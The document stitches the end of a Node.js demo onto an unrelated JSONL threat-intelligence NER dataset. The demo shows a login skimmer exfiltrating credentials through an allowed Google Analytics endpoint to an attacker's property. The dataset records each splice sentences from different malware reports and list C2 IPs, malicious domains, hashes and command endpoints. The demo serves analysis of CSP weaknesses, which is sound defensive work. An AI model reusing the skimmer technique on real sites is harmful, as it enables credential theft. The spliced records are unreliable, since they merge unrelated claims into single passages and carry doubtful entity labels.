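const SITE_ORIGIN = 'https://login.example.com'; // constructed victim site
const SITE_TID = 'UA-11111111-1';                 // constructed: the site's own property
const ATTACKER_TID = 'UA-99999999-9';             // constructed: attacker-controlled property
const POLICY = parseCsp("default-src 'self'; connect-src 'self' https://www.google-analytics.com; img-src 'self' https://www.google-analytics.com");
// An attempt to pin the account in the query string; the query is dropped, so it changes nothing.
const QUERY_PINNED_POLICY = parseCsp(`connect-src 'self' https://www.google-analytics.com/collect?tid=${SITE_TID}`);

function demo() {
  const legit = buildGaHit(SITE_TID, SITE_ORIGIN + '/login');
  const exfil = skimmerHit(ATTACKER_TID, 'alice', 'hunter2');
  return {
    legitAllowed: cspAllows(POLICY, 'connect-src', legit, SITE_ORIGIN),
    exfilAllowed: cspAllows(POLICY, 'connect-src', exfil, SITE_ORIGIN),
    otherHostBlocked: !cspAllows(POLICY, 'connect-src', 'https://evil.example.net/c', SITE_ORIGIN),
    queryPinnedStillAllowsExfil: cspAllows(QUERY_PINNED_POLICY, 'connect-src', exfil, SITE_ORIGIN),
    recovered: decodeSkimmedHit(exfil),
  };
}

// Hypothetical "adaptive URL" collector with the account ID in the path, so a
// path-scoped source expression can pin the page to its own property.
function buildAdaptiveHit(tid, documentLocation) {
  const hit = new URL(`https://www.google-analytics.com/${tid}/collect`);
  hit.search = new URLSearchParams({ v: '1', t: 'pageview', dl: documentLocation }).toString();
  return hit.toString();
}
const ADAPTIVE_POLICY = parseCsp(`default-src 'self'; connect-src 'self' https://www.google-analytics.com/${SITE_TID}/`);

function adaptiveDemo() {
  return {
    legitAllowed: cspAllows(ADAPTIVE_POLICY, 'connect-src', buildAdaptiveHit(SITE_TID, SITE_ORIGIN + '/login'), SITE_ORIGIN),
    exfilAllowed: cspAllows(ADAPTIVE_POLICY, 'connect-src', buildAdaptiveHit(ATTACKER_TID, 'c2VjcmV0'), SITE_ORIGIN),
  };
}

console.log(JSON.stringify({ hostAllowlist: demo(), adaptiveUrl: adaptiveDemo() }, null, 2));
```

Run with node. demo() shows the site's own hit and the skimmer's hit both passing the hostname allow-list, an unlisted host being blocked, the query-pinned policy silently reduced to /collect and still admitting the attacker's hit, and the credentials recovered from dl; adaptiveDemo() shows that once the account ID is part of the path, a path-scoped connect-src source admits only the site's own property. The caveat is that this only helps if the collector actually exposes the account in the host or path, which the real /collect endpoint does not; the blind spot in a hostname-only allow-list remains.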
The first signs of Butterfly 's activities emerged in early 2013 when several major technology and internet firms were compromised . We link the AveMaria botnet to these two groups with medium confidence : AveMaria \u2019s targets are mostly suppliers for big companies , and the way AveMaria manages its infrastructure is very similar to FIN7 . Over 5 years ago , we began tracking a new campaign that we called FakeUpdates ( also known as SocGholish ) that used compromised websites to trick users into running a fake browser update .", "spans": [{"start": 34, "end": 45, "label": "System"}, {"start": 161, "end": 180, "label": "System"}, {"start": 267, "end": 277, "label": "Organization"}, {"start": 282, "end": 296, "label": "Organization"}, {"start": 328, "end": 336, "label": "Malware"}, {"start": 389, "end": 397, "label": "Malware"}, {"start": 462, "end": 470, "label": "Malware"}, {"start": 517, "end": 521, "label": "Organization"}, {"start": 567, "end": 575, "label": "Organization"}, {"start": 591, "end": 602, "label": "Malware"}, {"start": 619, "end": 629, "label": "Malware"}]} {"text": "Figure 2 \u2013 Granting Permissions The following permissions are granted to the app : Figure 3 \u2013 Permissions Granted to App A closer look at the code reveals the application gathers a list of installed applications to compare the results against a list of targeted applications ( Figure 4 ) . However , an investigation by Symantec has found that the group has been active since at least March 2012 and its attacks have not only continued to the present day , but have also increased in number . The last piece is the newly discovered CopyPaste group , who targeted financial entities and companies in one African country , which lead us to think that CopyPaste was associated with cybermercenaries or a training center . 
Instead , victims would end up infecting their computers with the NetSupport RAT , allowing threat actors to gain remote access and deliver additional payloads .", "spans": [{"start": 320, "end": 328, "label": "Organization"}, {"start": 532, "end": 541, "label": "Organization"}, {"start": 649, "end": 658, "label": "Organization"}, {"start": 729, "end": 736, "label": "Organization"}, {"start": 785, "end": 799, "label": "System"}]} {"text": "The malware mainly targets banking and financial applications , but also looks for popular shopping apps such as eBay or Amazon . Symantec has to date discovered 49 different organizations in more than 20 countries that have been attacked by Butterfly . The links between CopyPaste and FIN7 are still very weak . As we have seen over the years , SocGholish is an established player that has managed to compromise countless victims and deliver ransomware after facilitating the installation of tools like Cobalt Strike or Mimikatz .", "spans": [{"start": 113, "end": 117, "label": "Organization"}, {"start": 121, "end": 127, "label": "Organization"}, {"start": 130, "end": 138, "label": "Organization"}, {"start": 272, "end": 281, "label": "Organization"}, {"start": 286, "end": 290, "label": "Organization"}, {"start": 346, "end": 356, "label": "Malware"}, {"start": 504, "end": 517, "label": "System"}, {"start": 521, "end": 529, "label": "System"}]} {"text": "A full list of targeted applications is included in the IOC section at the end of this post . Aside from the four companies which have publicly acknowledged attacks , Symantec has identified five other large technology firms compromised by Butterfly , primarily headquartered in the US . It is possible that the operators of this cluster of activity were influenced by open-source publications and do not have any ties with FIN7 . 
The new campaign , which we call FakeSG , also relies on hacked WordPress websites to display a custom landing page mimicking the victim 's browser .", "spans": [{"start": 167, "end": 175, "label": "Organization"}, {"start": 208, "end": 224, "label": "Organization"}, {"start": 424, "end": 428, "label": "Organization"}, {"start": 439, "end": 447, "label": "Organization"}, {"start": 464, "end": 470, "label": "Malware"}, {"start": 488, "end": 513, "label": "System"}]} {"text": "Once an application has been identified , Anubis overlays the original application with a fake login page to capture the user \u2019 s credentials . In the first attack , Butterfly gained a foothold by first attacking a small European office belonging to one firm and using this infection to then move on to its US office and European headquarters . All of the aforementioned groups greatly benefit from unpatched systems in corporate environments . The threat actors are distributing NetSupport RAT either as a zipped download or via an Internet shortcut .", "spans": [{"start": 42, "end": 48, "label": "Malware"}, {"start": 449, "end": 462, "label": "Organization"}, {"start": 480, "end": 494, "label": "System"}]} {"text": "Figure 4 \u2013 Checking for installed apps Based on a thorough analysis of the code , the most interesting technical capabilities include : Capturing screenshots Enabling or changing administration settings Opening and visiting any URL Disabling Play Protect Recording audio Making phone calls Stealing the contact list Controlling the device via VNC Sending , receiving and deleting SMS Locking the device Encrypting files on the device and external drives Searching for files Retrieving the GPS location Capturing remote control commands from Twitter and Telegram Pushing overlays Reading the device ID The malware includes However , technology is not the only sector the group has focused on and Symantec has found evidence that Butterfly has attacked three major European pharmaceutical 
firms . They thus continue to use effective spearphishing campaigns in conjunction with well-known MS Office exploits generated by the framework . While FakeSG appears to be a newcomer , it uses different layers of obfuscation and delivery techniques that make it a threat to take seriously and which could potentially rival with SocGholish .", "spans": [{"start": 541, "end": 548, "label": "System"}, {"start": 553, "end": 561, "label": "System"}, {"start": 632, "end": 642, "label": "Organization"}, {"start": 695, "end": 703, "label": "Organization"}, {"start": 772, "end": 792, "label": "Organization"}, {"start": 886, "end": 888, "label": "Organization"}, {"start": 889, "end": 895, "label": "System"}, {"start": 940, "end": 946, "label": "Malware"}, {"start": 1117, "end": 1127, "label": "Malware"}]} {"text": "a keylogger that works in every app installed on the Android device . Butterfly has also shown an interest in the commodities sector , attacking two major companies involved in gold and oil in late 2014 . So far , the groups have not used any zero-days . We first heard of this new campaign thanks to a Mastodon post by Randy McEoin .", "spans": [{"start": 53, "end": 60, "label": "System"}, {"start": 70, "end": 79, "label": "Organization"}, {"start": 114, "end": 132, "label": "Organization"}, {"start": 177, "end": 181, "label": "Organization"}, {"start": 186, "end": 189, "label": "Organization"}, {"start": 243, "end": 252, "label": "Vulnerability"}, {"start": 282, "end": 290, "label": "Organization"}, {"start": 303, "end": 311, "label": "Organization"}, {"start": 320, "end": 332, "label": "Organization"}]} {"text": "However , the keylogger needs to be specifically enabled by a command sent from the C2 server . The company specializes in finance and natural resources specific to that region . FIN7 S-APT/Cobalt phishing documents may seem basic , but when combined with their extensive social engineering and focused targeting , they are quite successful . 
The tactics , techniques and procedures ( TTPs ) are very similar to those of SocGholish and it would be easy to think the two are related .", "spans": [{"start": 123, "end": 130, "label": "Organization"}, {"start": 179, "end": 196, "label": "Malware"}, {"start": 421, "end": 431, "label": "Malware"}]} {"text": "The keylogger can track three different events ( Figure 5 ) : TYPE_VIEW_CLICKED Represents the event of clicking on a View-like Button , CompoundButton , etc . The latter was one of at least three law firms Butterfly has targeted over the past three years . As with their previous fake company \u201c Combi Security \u201d , we are confident that they continue to create new personas for use in either targeting or recruiting under a \u201c new \u201d brand , \u201c IPC \u201d . In fact , this chain also leads to NetSupport RAT .", "spans": [{"start": 197, "end": 206, "label": "Organization"}, {"start": 207, "end": 216, "label": "Organization"}, {"start": 296, "end": 310, "label": "Organization"}, {"start": 442, "end": 445, "label": "Organization"}, {"start": 485, "end": 499, "label": "System"}]} {"text": "TYPE_VIEW_FOCUSED Represents the event of setting input focus of a View . In many attacks , the group has succeeded in compromising Microsoft Exchange or Lotus Domino email servers in order to intercept company emails and possibly use them to send counterfeit emails . AveMaria : 185.61.138.249 tain.warzonedns.com noreply377.ddns.net 185.162.131.97 91.192.100.62 server.mtcc.me doddyfire.dyndns.org 212.8.240.116 168.167.45.162 toekie.ddns.net warmaha.warzonedns.com . 
As a result , we decided to call this variant FakeSG .", "spans": [{"start": 132, "end": 150, "label": "System"}, {"start": 154, "end": 180, "label": "System"}, {"start": 269, "end": 277, "label": "Malware"}, {"start": 280, "end": 294, "label": "Indicator"}, {"start": 295, "end": 314, "label": "Indicator"}, {"start": 315, "end": 334, "label": "Indicator"}, {"start": 335, "end": 349, "label": "Indicator"}, {"start": 350, "end": 363, "label": "Indicator"}, {"start": 364, "end": 378, "label": "Indicator"}, {"start": 379, "end": 399, "label": "Indicator"}, {"start": 400, "end": 413, "label": "Indicator"}, {"start": 414, "end": 428, "label": "Indicator"}, {"start": 429, "end": 444, "label": "Indicator"}, {"start": 445, "end": 467, "label": "Indicator"}, {"start": 516, "end": 522, "label": "Malware"}]} {"text": "TYPE_VIEW_TEXT_CHANGED Represents the event of changing the text of an EditText . A powerful threat actor known as \" Wild Neutron \" ( also known as \" Jripbot \" and \" Morpho \" ) has been active since at least 2011 , infecting high profile companies for several years by using a combination of exploits , watering holes and multi-platform malware . CopyPaste : digi-cert.org somtelnetworks.com geotrusts.com secureclientupdate.com digicertweb.com sport-pesa.org itaxkenya.com businessdailyafrica.net infotrak-research.com nairobiwired.com k-24tv.com . 
2023 - 07 - 19 Update : On June 5 , @SecurityAura described an unknown campaign using .hta payloads disguised as driver updates .", "spans": [{"start": 150, "end": 157, "label": "Organization"}, {"start": 166, "end": 172, "label": "Organization"}, {"start": 225, "end": 247, "label": "Organization"}, {"start": 347, "end": 356, "label": "Organization"}, {"start": 359, "end": 372, "label": "Indicator"}, {"start": 373, "end": 391, "label": "Indicator"}, {"start": 392, "end": 405, "label": "Indicator"}, {"start": 406, "end": 428, "label": "Indicator"}, {"start": 429, "end": 444, "label": "Indicator"}, {"start": 445, "end": 459, "label": "Indicator"}, {"start": 460, "end": 473, "label": "Indicator"}, {"start": 474, "end": 497, "label": "Indicator"}, {"start": 498, "end": 519, "label": "Indicator"}, {"start": 520, "end": 536, "label": "Indicator"}, {"start": 537, "end": 547, "label": "Indicator"}, {"start": 586, "end": 599, "label": "Organization"}]} {"text": "Figure 5 \u2013 Keylogger component Figure 6 shows one of the most noteworthy functions of Anubis : its ransomware module . Based on the profile of the victims and the type of information targeted by the attackers , Symantec believes that Butterfly is financially motivated , stealing information it can potentially profit from . FIN7 S-APT/GRIFFON : hpservice-cdn.com realtek-cdn.com logitech-cdn.com pci-cdn.com appleservice-cdn.com servicebing-cdn.com . 
On June 22 , @AnFam17 spotted the same fake browser update leveraging URL shortcuts .", "spans": [{"start": 86, "end": 92, "label": "Malware"}, {"start": 211, "end": 219, "label": "Organization"}, {"start": 325, "end": 343, "label": "Malware"}, {"start": 346, "end": 363, "label": "Indicator"}, {"start": 364, "end": 379, "label": "Indicator"}, {"start": 380, "end": 396, "label": "Indicator"}, {"start": 397, "end": 408, "label": "Indicator"}, {"start": 409, "end": 429, "label": "Indicator"}, {"start": 430, "end": 449, "label": "Indicator"}, {"start": 465, "end": 473, "label": "Organization"}]} {"text": "The malware searches both internal and external storage and encrypts them using RC4 . Wild Neutron hit the spotlight in 2013 , when it successfully infected companies such as Apple , Facebook , Twitter and Microsoft . ScarCruft continues to evolve, introduces Bluetooth harvester . Both of these campaigns use a similar structure with compromised WordPress sites hosting the lure shortcuts and a WebDav server that loads NetSupport RAT .", "spans": [{"start": 175, "end": 180, "label": "Organization"}, {"start": 183, "end": 191, "label": "Organization"}, {"start": 194, "end": 201, "label": "Organization"}, {"start": 206, "end": 215, "label": "Organization"}, {"start": 218, "end": 227, "label": "Organization"}, {"start": 260, "end": 269, "label": "System"}, {"start": 347, "end": 362, "label": "System"}, {"start": 396, "end": 409, "label": "System"}]} {"text": "It adds the file extension .AnubisCrypt to each encrypted file and sends it to the C2 . Wild Neutron 's attacks in 2015 uses a stolen code signing certificate belonging to Taiwanese electronics maker Acer and an unknown Flash Player exploit . After publishing our initial series of blogposts back in 2016 , we have continued to track the ScarCruft threat actor . 
RussianPanda ( @AnFam17 ) named the URL shortcut campaign RogueRaticate .", "spans": [{"start": 27, "end": 39, "label": "Indicator"}, {"start": 88, "end": 100, "label": "Organization"}, {"start": 127, "end": 158, "label": "System"}, {"start": 182, "end": 193, "label": "Organization"}, {"start": 220, "end": 240, "label": "Vulnerability"}, {"start": 338, "end": 347, "label": "Organization"}, {"start": 363, "end": 375, "label": "Organization"}, {"start": 421, "end": 434, "label": "Malware"}]} {"text": "Figure 6 \u2013 Ransomware component Anubis has been known to utilize Twitter or Telegram to retrieve the C2 address and this sample is no exception ( Figure 7 ) . During the 2013 attacks , the Wild Neutron actor successfully compromised and leveraged the website www.iphonedevsdk.com , which is an iPhone developers forum . ScarCruft is a Korean-speaking and allegedly state-sponsored threat actor that usually targets organizations and companies with links to the Korean peninsula . FakeSG has different browser templates depending on which browser the victim is running .", "spans": [{"start": 32, "end": 38, "label": "Malware"}, {"start": 65, "end": 72, "label": "Organization"}, {"start": 76, "end": 84, "label": "Organization"}, {"start": 320, "end": 329, "label": "Organization"}, {"start": 480, "end": 486, "label": "Malware"}]} {"text": "Figure 7 \u2013 C2 As seen in Figure 8 , this version of Anubis is built to run on several iterations of the Android operating system , dating back to version 4.0.3 , which was released in 2012 . Wild Neutron 's attack took advantage of a Java zero-day exploit and used hacked forums as watering holes . We recently discovered some interesting telemetry on this actor , and decided to dig deeper into ScarCruft \u2019s recent activity . 
The themed \" updates \" look very professional and are more up to date than its SocGholish counterpart .", "spans": [{"start": 52, "end": 58, "label": "Malware"}, {"start": 104, "end": 111, "label": "System"}, {"start": 191, "end": 203, "label": "Organization"}, {"start": 234, "end": 255, "label": "Vulnerability"}, {"start": 396, "end": 405, "label": "Organization"}, {"start": 506, "end": 516, "label": "Malware"}]} {"text": "Figure 8 \u2013 Android requirements Android malware has been around for many years and will be with us for the foreseeable future . While the group used watering hole attacks in 2013 , it's still unclear how victims get redirected to the exploitation kits in the new 2014-2015 attacks . This shows that the actor is still very active and constantly trying to elaborate its attack tools . Compromised websites ( WordPress appears to be the top target ) are injected with a code snippet that replaces the current webpage with the aforementioned fake updates templates .", "spans": [{"start": 11, "end": 18, "label": "System"}, {"start": 32, "end": 39, "label": "System"}, {"start": 384, "end": 404, "label": "System"}, {"start": 407, "end": 416, "label": "Organization"}]} {"text": "Users who have configured their Android mobile device to receive work-related emails and allow installation of unsigned applications face the most risk of compromise . Wild Neutron 's tools include a password harvesting trojan , a reverse-shell backdoor and customized implementations of OpenSSH , WMIC and SMB . Based on our telemetry , we can reassemble ScarCruft \u2019s binary infection procedure . 
The source code is loaded from one of several domains impersonating Google ( google - analytiks[.]com ) or Adobe ( updateadobeflash[.]website ): That code contains all the web elements ( images , fonts , text ) needed to render the fake browser update page .", "spans": [{"start": 32, "end": 39, "label": "System"}, {"start": 168, "end": 180, "label": "Organization"}, {"start": 200, "end": 226, "label": "System"}, {"start": 231, "end": 253, "label": "System"}, {"start": 258, "end": 295, "label": "System"}, {"start": 298, "end": 302, "label": "System"}, {"start": 307, "end": 310, "label": "System"}, {"start": 356, "end": 365, "label": "Organization"}, {"start": 466, "end": 472, "label": "System"}, {"start": 505, "end": 510, "label": "System"}]} {"text": "APK files will not natively open in an environment other than an Android device . Instead of Flash exploits , older Wild Neutron exploitation and watering holes used what was a Java zero-day at the end of 2012 and the beginning of 2013 , detected by Kaspersky Lab products as Exploit.Java.CVE-2012-3213.b . It used a multi-stage binary infection to update each module effectively and evade detection . We should note that SocGholish used to retrieve media files from separate web requests until more recently when it started using self - contained Base64 encoded images .", "spans": [{"start": 65, "end": 72, "label": "System"}, {"start": 93, "end": 107, "label": "Vulnerability"}, {"start": 177, "end": 190, "label": "Vulnerability"}, {"start": 250, "end": 263, "label": "Organization"}, {"start": 276, "end": 304, "label": "Vulnerability"}, {"start": 422, "end": 432, "label": "Malware"}]} {"text": "With the increased use of Android phones in business environments , it is important to defend against these threats by ensuring devices are kept current with the latest updates . 
The victims for the 2014-2015 versions are generally IT and real estate/investment companies and in both cases , a small number of computers have been infected throughout Wild Neutron . In addition , we analyzed the victims of this campaign and spotted an interesting overlap of this campaign with another APT actor known as DarkHotel . There are different installation flows for this campaign , but we will focus on the one that uses a URL shortcut .", "spans": [{"start": 26, "end": 33, "label": "System"}, {"start": 232, "end": 234, "label": "Organization"}, {"start": 239, "end": 271, "label": "Organization"}, {"start": 350, "end": 362, "label": "Organization"}, {"start": 504, "end": 513, "label": "Organization"}, {"start": 564, "end": 572, "label": "Organization"}]} {"text": "Limiting app installations on corporate devices , as well as ensuring that applications are created by trusted developers on official marketplaces , can help in reducing the risk of infection as well . Wild Neutron 's targeting of major IT companies , spyware developers ( FlexiSPY ) , jihadist forums ( the \" Ansar Al-Mujahideen English Forum \" ) and Bitcoin companies indicate a flexible yet unusual mindset and interests . The ScarCruft group uses common malware delivery techniques such as spear phishing and Strategic Web Compromises ( SWC ) . 
This shorcut uses the WebDav HTTP protocol extension to retrieve the file launcher-upd.hta from a remote server : This heavily obfuscated script is responsible for the execution of PowerShell that downloads the final malware payload ( NetSupport RAT ) .", "spans": [{"start": 202, "end": 214, "label": "Organization"}, {"start": 237, "end": 249, "label": "Organization"}, {"start": 252, "end": 270, "label": "Organization"}, {"start": 273, "end": 281, "label": "Organization"}, {"start": 286, "end": 301, "label": "Organization"}, {"start": 310, "end": 343, "label": "Organization"}, {"start": 352, "end": 369, "label": "Organization"}, {"start": 430, "end": 439, "label": "Organization"}, {"start": 663, "end": 781, "label": "Malware"}, {"start": 784, "end": 798, "label": "Malware"}]} {"text": "ViceLeaker Operation : mobile espionage targeting Middle East 26 JUN 2019 In May 2018 , we discovered a campaign targeting dozens of mobile Android devices belonging to Israeli citizens . We continue to track the Wild Neutron group , which is still active as of June 2015 . As in Operation Daybreak , this actor performs sophisticated attacks using a zero-day exploit . Malwarebytes 's EDR shows the full attack chain ( please click to enlarge ): The NetSupport RAT files are hosted on the same compromised WordPress site used earlier to download the Internet shortcut .", "spans": [{"start": 0, "end": 10, "label": "Malware"}, {"start": 140, "end": 147, "label": "System"}, {"start": 213, "end": 231, "label": "Organization"}, {"start": 351, "end": 359, "label": "Malware"}, {"start": 370, "end": 385, "label": "Organization"}, {"start": 451, "end": 465, "label": "Malware"}]} {"text": "Kaspersky spyware sensors caught the signal of an attack from the device of one of the victims ; and a hash of the APK involved ( Android application ) was tagged in our sample feed for inspection . 
A ransomware variant dubbed PyLocky was observed in September 2018 being distributed by a phishing campaign using an invoicing theme . However , sometimes using public exploit code is quicker and more effective for malware authors . The RAT 's main binary is launched from \" C:\\Users\\%username%\\AppData\\Roaming\\BranScale\\client32.exe \" .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 130, "end": 137, "label": "System"}, {"start": 227, "end": 234, "label": "System"}]} {"text": "Once we looked into the file , we quickly found out that the inner-workings of the APK included a malicious payload , embedded in the original code of the application . PyLocky was found to be targeting entities in France and Germany . We witnessed this actor extensively testing a known public exploit during its preparation for the next campaign . Fake browser updates are a very common decoy used by malware authors .", "spans": [{"start": 169, "end": 176, "label": "System"}]} {"text": "This was an original spyware program , designed to exfiltrate almost all accessible information . Fxmsp specialize in breaching highly secure protected networks to access private corporate and government information . In order to deploy an implant for the final payload , ScarCruft uses a multi-stage binary infection scheme . 
In addition to SocGholish , the Domen toolkit was a well - built framework that emerged in 2019 while another campaign known as sczriptzzbn dropped SolarMarker leading to the NetSupport RAT in both cases .", "spans": [{"start": 98, "end": 103, "label": "Organization"}, {"start": 272, "end": 281, "label": "Organization"}, {"start": 342, "end": 352, "label": "Malware"}, {"start": 359, "end": 372, "label": "Malware"}, {"start": 455, "end": 466, "label": "Malware"}, {"start": 475, "end": 486, "label": "Malware"}, {"start": 502, "end": 516, "label": "Malware"}]} {"text": "During the course of our research , we noticed that we were not the only ones to have found the operation . Fxmsp is a hacking collective that has operated in various top-tier Russian- and English-speaking underground communities since 2017 . As a rule , the initial dropper is created by the infection procedure . Initial access brokers use tools like NetSupport RAT to gather information and perform additional actions on victims of interest .", "spans": [{"start": 108, "end": 113, "label": "Organization"}, {"start": 353, "end": 367, "label": "System"}]} {"text": "Researchers from Bitdefender also released an analysis of one of the samples in a blogpost . Throughout 2017 and 2018 , Fxmsp established a network of trusted proxy resellers to promote their breaches on the criminal underground . One of the most notable functions of the initial dropper is to bypass Windows UAC ( User Account Control ) in order to execute the next payload with higher privileges . 
Stolen credentials can be resold to other threat actors tied to ransomware gangs .", "spans": [{"start": 17, "end": 28, "label": "System"}, {"start": 120, "end": 125, "label": "Organization"}, {"start": 301, "end": 308, "label": "System"}, {"start": 309, "end": 312, "label": "System"}, {"start": 315, "end": 335, "label": "System"}]} {"text": "Although something had already been published , we decided to do something different with the data we acquired . On April 24 , 2019 , Fxmsp claimed to have secured access to three leading antivirus companies . This malware uses the public privilege escalation exploit code CVE-2018-8120 or UACME which is normally used by legitimate red teams . We will continue to monitor these campaigns and in particular SocGholish to see if the web delivery landscape changes .", "spans": [{"start": 134, "end": 139, "label": "Organization"}, {"start": 188, "end": 207, "label": "Organization"}, {"start": 273, "end": 286, "label": "Vulnerability"}, {"start": 290, "end": 295, "label": "Vulnerability"}, {"start": 407, "end": 417, "label": "Malware"}]} {"text": "The following month , we released a private report on our Threat Intelligence Portal to alert our clients about this newly discovered operation and began writing YARA rules in order to catch more samples . According to the Fxmsp , they worked tirelessly for the first quarter of 2019 to breach these companies and finally succeeded and obtained access to the companies' internal networks . Afterwards , the installer malware creates a downloader and a configuration file from its resource and executes it . Malwarebytes customers are protected as we detect the infrastructure and final payload used in these attacks .", "spans": [{"start": 407, "end": 416, "label": "System"}, {"start": 507, "end": 519, "label": "Organization"}]} {"text": "We decided to call the operation \u201c ViceLeaker \u201d , because of strings and variables in its code . 
Booz Allen Hamilton in 2014 and AhnLab in 2015 reported on Bisonal using a simple XOR cipher to hide the C2 address strings in the body . For example , Bisonal malware in 2012 used send() and recv() APIs to communicate with its C2 This Bisonal variant used in the latest attack communicates with one of the following hard-coded C2 addresses by using the HTTP POST method on TCP port 443 . The downloader malware uses the configuration file and connects to the C2 server to fetch the next payload . Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected .", "spans": [{"start": 35, "end": 45, "label": "Malware"}, {"start": 97, "end": 116, "label": "Organization"}, {"start": 129, "end": 135, "label": "Organization"}, {"start": 249, "end": 264, "label": "Organization"}, {"start": 333, "end": 340, "label": "Malware"}, {"start": 490, "end": 500, "label": "System"}, {"start": 557, "end": 559, "label": "System"}]} {"text": "Mobile ViceLeaker The following table shows meta information on the observed samples , including compiler timestamps : MD5 Package Compiler C2 51df2597faa3fce38a4c5ae024f97b1c com.xapps.SexGameForAdults dexlib 2.x 188.165.28 [ . Previous reports have discussed Bisonal malware used in attacks against Japan , South Korea and Russia . In order to evade network level detection , the downloader uses steganography .", "spans": [{"start": 7, "end": 17, "label": "Malware"}, {"start": 143, "end": 175, "label": "Indicator"}, {"start": 176, "end": 202, "label": "Indicator"}, {"start": 214, "end": 228, "label": "Indicator"}, {"start": 261, "end": 276, "label": "Malware"}, {"start": 382, "end": 392, "label": "System"}]} {"text": "] 251 2d108ff3a735dea1d1fdfa430f37fab2 com.psiphon3 dexlib 2.x 188.165.49 [ . This particular sample we found targeted an organization in Russia and there is a specific system language check for Cyrillic and no others . 
The downloaded payload is an image file , but it contains an appended malicious payload to be decrypted .", "spans": [{"start": 6, "end": 38, "label": "Indicator"}, {"start": 39, "end": 51, "label": "Indicator"}, {"start": 63, "end": 77, "label": "Indicator"}, {"start": 94, "end": 100, "label": "Malware"}]} {"text": "] 205 7ed754a802f0b6a1740a99683173db73 com.psiphon3 dexlib 2.x 188.165.49 [ . If it's Cyrillic and the command to the shell is not \u2018ipconfig\u2019 , the threat converts the command result text encoding from Cyrillic to UTF-16 . The final payload created by the aforementioned process is a well known backdoor , also known as ROKRAT by Cisco Talos .", "spans": [{"start": 6, "end": 38, "label": "Indicator"}, {"start": 39, "end": 51, "label": "Indicator"}, {"start": 63, "end": 77, "label": "Indicator"}, {"start": 81, "end": 85, "label": "Malware"}, {"start": 86, "end": 94, "label": "System"}, {"start": 214, "end": 220, "label": "System"}, {"start": 320, "end": 326, "label": "Malware"}, {"start": 330, "end": 341, "label": "Organization"}]} {"text": "] 205 3b89e5cd49c05ce6dc681589e6c368d9 ir.abed.dastan dexlib 2.x 185.141.60 [ . Similar to the Bisonal variant targeting the Russian organization , this sample was also disguised as PDF document . This cloud service-based backdoor contains many features .", "spans": [{"start": 6, "end": 38, "label": "Indicator"}, {"start": 39, "end": 53, "label": "Indicator"}, {"start": 65, "end": 79, "label": "Indicator"}, {"start": 95, "end": 102, "label": "Malware"}]} {"text": "] 213 To backdoor legitimate applications , attackers used a Smali injection technique \u2013 a type of injection that allows attackers to disassemble the code of original app with the Baksmali tool , add their malicious code , and assemble it with Smali . The contents of the decoy PDF is a job descriptions with the South Korean Coast Guard . 
One of its main functions is to steal information .", "spans": [{"start": 268, "end": 281, "label": "Malware"}, {"start": 326, "end": 337, "label": "Organization"}]} {"text": "As a result , due to such an unusual compilation process , there were signs in the dex file that point to dexlib , a library used by the Smali tool to assemble dex files . The installed EXE file is almost exactly the same as the DLL version of Bisonal variant used against the Russian organization . Upon execution , this malware creates 10 random directory paths and uses them for a specially designated purpose .", "spans": [{"start": 176, "end": 194, "label": "Malware"}, {"start": 244, "end": 259, "label": "Malware"}]} {"text": "Original code of the APK on the left , versus injected APK on the right The analysis of the APK was rather interesting , because some of the actions were very common spyware features , such as the exfiltration of SMS messages , call logs and other data . The targets are military or defense industry in particular countries , it used DDNS for C2 servers , and tracked connections from their victims by using target or campaign codes , as well as disguising the malware as document file , and using a dropper to install the malware and decoy file . The malware creates 11 threads simultaneously : six threads are responsible for stealing information from the infected host , and five threads are for forwarding collected data to four cloud services ( Box , Dropbox , Pcloud and Yandex ) .", "spans": [{"start": 500, "end": 507, "label": "System"}, {"start": 750, "end": 753, "label": "System"}, {"start": 756, "end": 763, "label": "System"}, {"start": 766, "end": 772, "label": "System"}, {"start": 777, "end": 783, "label": "System"}]} {"text": "However , in addition to the traditional functionality , there were also backdoor capabilities such as upload , download , delete files , camera takeover and record surrounding audio . 
A previous campaign of this APT group was uncovered by Talos in June 2017 , and since then very little of this operation was seen in the wild . When uploading stolen data to a cloud service , it uses predefined directory path such as /english , /video or /scriptout .", "spans": [{"start": 240, "end": 245, "label": "Organization"}]} {"text": "The malware uses HTTP for communication with the C2 server for command handling and data exfiltration . ined in the archive is called DriverInstallerU.exe but its metadata shows that its original name is Interenet Assistant.exe . The ScarCruft group keeps expanding its Exfiltration targets to steal further information from infected hosts and continues to create tools for additional data Exfiltration .", "spans": [{"start": 134, "end": 154, "label": "Malware"}, {"start": 204, "end": 227, "label": "Malware"}, {"start": 234, "end": 243, "label": "Organization"}]} {"text": "Here is a command and control protocol fragment : Commands from C2 server parsing In total , the malicious APK handles 16 different commands : Command Endpoint Description 1 reqsmscal.php Send specified SMS message 2 reqsmscal.php Call specified number 3 reqsmscal.php Exfiltrate device info , such as phone model and OS version 4 reqsmscal.php Exfiltrate a list of all installed applications 5 reqsmscal.php Exfiltrate default browser history ( limited to a given date ) 6 reqsmscal.php After reviewing all the malware functionalities , we are confident in saying that the attackers look for victims who answer well-defined characteristics and believe that further stages of the attack are delivered only to those who fit the specific victim profile . 
We also discovered an interesting piece of rare malware created by this threat actor \u2013 a Bluetooth device harvester .", "spans": [{"start": 174, "end": 187, "label": "Indicator"}, {"start": 217, "end": 230, "label": "Indicator"}, {"start": 255, "end": 268, "label": "Indicator"}, {"start": 331, "end": 344, "label": "Indicator"}, {"start": 395, "end": 408, "label": "Indicator"}, {"start": 474, "end": 487, "label": "Indicator"}, {"start": 574, "end": 583, "label": "Organization"}, {"start": 593, "end": 611, "label": "Organization"}, {"start": 842, "end": 851, "label": "System"}]} {"text": "Exfiltrate Chrome browser history ( limited to a given date ) 7 reqsmscal.php Exfiltrate memory card file structure 8 reqsmscal.php Record surrounding sound for 80 seconds 1 reqcalllog.php Exfiltrate all call logs 2 reqcalllog.php Exfiltrate all SMS messages 3 reqcalllog.php Upload specified file from the device to the C2 4 reqcalllog.php Download file from specified URL and save on device 5 reqcalllog.php Delete specified file 6,7,8 reqcalllog.php Commands not yet In this sample , however , the module names were changed from actors and characters\u2019 names to car models , namely BMW_x1\u201d , BMW_x2\u201d and up to BMW_x8\u201d . 
